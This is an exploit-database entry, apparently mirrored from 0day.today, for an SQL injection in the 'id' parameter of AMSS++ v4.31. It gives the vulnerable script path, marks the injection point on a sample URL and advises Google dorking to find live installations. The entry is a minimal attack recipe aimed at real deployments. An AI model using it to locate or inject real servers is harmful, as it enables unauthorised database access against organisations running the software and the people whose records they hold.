Exploit for AMSS++ v 4.31 - (id) SQL Injection Vulnerability

Name: Exploit for AMSS++ v 4.31 - (id) SQL Injection Vulnerability
Rating: 5 (101 reviews)

2020-02-24 | CVSS 7.1

## https://sploitus.com/exploit?id=1337DAY-ID-33999
# Title : AMSS++ v 4.31 - 'id' SQL Injection
# Author : indoushka
# Tested on: windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) 
# Vendor: http://amssplus.ubn4.go.th/amssplus_download/amssplus_4_31_install.rar  
# Dork: แนะนำให้ใช้บราวเซอร์ Google Chrome "AMSS++"
# CVE: N/A

# poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Use payload : /modules/mail/main/maildetail.php?id=174

[+] http://127.0.0.1/amssplus_4_31_install/amssplus/modules/mail/main/maildetail.php?id=1 <==== inject here


Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |        
                                                                                                                                      |
=======================================================================================================================================

#  0day.today [2020-02-24]  #